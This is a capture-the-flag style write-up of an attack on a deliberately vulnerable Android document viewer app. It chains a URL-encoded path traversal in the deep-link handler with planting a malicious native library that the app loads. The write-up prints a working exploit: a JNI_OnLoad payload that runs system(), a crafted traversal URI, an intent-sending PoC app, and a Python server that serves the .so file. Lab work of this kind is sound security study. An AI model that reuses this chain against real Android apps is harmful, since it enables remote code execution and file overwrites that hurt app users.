document viewer

main activity

<activity
            android:name="com.mobilehackinglab.documentviewer.MainActivity"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.MAIN"/>
                <category android:name="android.intent.category.LAUNCHER"/>
            </intent-filter>
            <intent-filter>
                <action android:name="android.intent.action.VIEW"/>
                <category android:name="android.intent.category.DEFAULT"/>
                <category android:name="android.intent.category.BROWSABLE"/>
                <data android:scheme="file"/>
                <data android:scheme="http"/>
                <data android:scheme="https"/>
                <data android:mimeType="application/pdf"/>
            </intent-filter>
        </activity>

the main activity handles an intent with a deeplink to a pdf file

adb shell am start -n com.mobilehackinglab.documentviewer/.MainActivity -a android.intent.action.VIEW -d file:///sdcard/Download/dummy.pdf -t application/pdf

part 1 path traversal

The onCreate has a call to handleIntent() function which call renderPdf() with the uri and the copyFileFromUri()

this is the important part

the copyFileFromUri() is supposed to copy the downloaded pdf to the download folder /storage/emulated/0/Download and takes the file name from the last segement in the uri after / symbol using function called getLastPathSegment() if not existed a default name will be download.pdf

Now let’s test the way the file is copied

Uri uri = Uri.parse("http://192.168.1.142:5555/..%2fdummy.pdf");
Log.v("string",uri.toString());
Log.v("getLastPathSegment",uri.getLastPathSegment());

String path = "/data/user/0/com.mhl.viewer/files/testing";
File outfile = new File(path,uri.getLastPathSegment());
Log.v("outputpath", outfile.getAbsolutePath());

now we notice that:

1. The uri treat the url encoded ..%2f as a string

2. the getLastPathSegment() ignores the encoded path traversal ..%2f and return it decoded ../

for more info search CVE-2022-29580

so we can use this vulnerability to copy our file any where

part2 RCE

in the oncreate() method there is a call to a function called loadProLibrary();

in summary this function loads a native file called libdocviewer_pro.so in the path /native-libraries/ in my case this is the path

/data/user/0/com.mobilehackinglab.documentviewer/files/native-libraries/arm64-v8a

using logcat i searched the logs for the error and i found out that this file fails to laod because it does not exist

---

exploitation

the plan is to create a .so that executes commands and copy it in the path of libdocviewer_pro.so file using the path traversal vulnerability

creating a cpp file in android studio project

#include <jni.h>
#include <cstdlib>

JNIEXPORT jint JNI_OnLoad(JavaVM* vm, void* reserved) {
    system("touch /data/user/0/com.mobilehackinglab.documentviewer/exploited.txt");

    return JNI_VERSION_1_6;
}

i used JNI_OnLoad as this function is called automatically when the native library is loaded using System.load and executed a simple system command to create a file in the path /data/user/0/com.mobilehackinglab.documentviewer/exploited.txt

the build the app and you will find the .so file in the path AndroidStudioProjects/<project-name>/app/build/intermediates/merged_native_libs/debug/out/lib/arm64-v8a

craft url

it has to start with 4 or more ..%f to go to the root

..%2f..%2f..%2f..%2f..%2fdata%2fuser%2f0%2fcom.mobilehackinglab.documentviewer%2ffiles%2fnative-libraries%2farm64-v8a%2flibdocviewer_pro.so

when it is appended to the download folder path it will be like

/storage/emulated/0/Download../../../../../data/user/0/com.mobilehackinglab.documentviewer/files/native-libraries/arm64-v8a/libdocviewer_pro.so

so the file will be copied to

/data/user/0/com.mobilehackinglab.documentviewer/files/native-libraries/arm64-v8a/libdocviewer_pro.so

and system.load() will load and execute it

local server and poc app

lets build our app to send this uri

Intent intent = new Intent("android.intent.action.VIEW");
intent.setClassName("com.mobilehackinglab.documentviewer","com.mobilehackinglab.documentviewer.MainActivity");
intent.setData(Uri.parse("http://192.168.1.142:8080/..%2f..%2f..%2f..%2f..%2fdata%2fuser%2f0%2fcom.mobilehackinglab.documentviewer%2ffiles%2fnative-libraries%2farm64-v8a%2flibdocviewer_pro.so"));
startActivity(intent);

i had to create a python server file to return the .so because when i named the file as the uri and i used simple python3 -m http.server the linux made it a hidden file and it failed to load giving 404 code

import http.server
import os

FILE_PATH = "libdocviewer_pro.so"
PORT = 8080

class SimpleHTTPRequestHandler(http.server.BaseHTTPRequestHandler):
    def do_GET(self):

        if os.path.exists(FILE_PATH):

            self.send_response(200)
            self.send_header('Content-type', 'application/octet-stream')
            self.send_header('Content-Disposition', f'attachment; filename="{os.path.basename(FILE_PATH)}"')
            self.end_headers()
            
            with open(FILE_PATH, 'rb') as file:
                self.wfile.write(file.read())
        else:
            self.send_response(404)
            self.end_headers()
            self.wfile.write(b"File not found")

def run(server_class=http.server.HTTPServer, handler_class=SimpleHTTPRequestHandler):
    server_address = ('', PORT)
    httpd = server_class(server_address, handler_class)
    print(f"Serving on port {PORT}...")
    httpd.serve_forever()

if __name__ == "__main__":
    run()

hit exploit to send the intent

and we get an http request to our server

let’s check that the file exists

the .so file is copied successfully means we exploited path traversal successfully

and the exploited.txt is created means our command has executed and we gained an RCE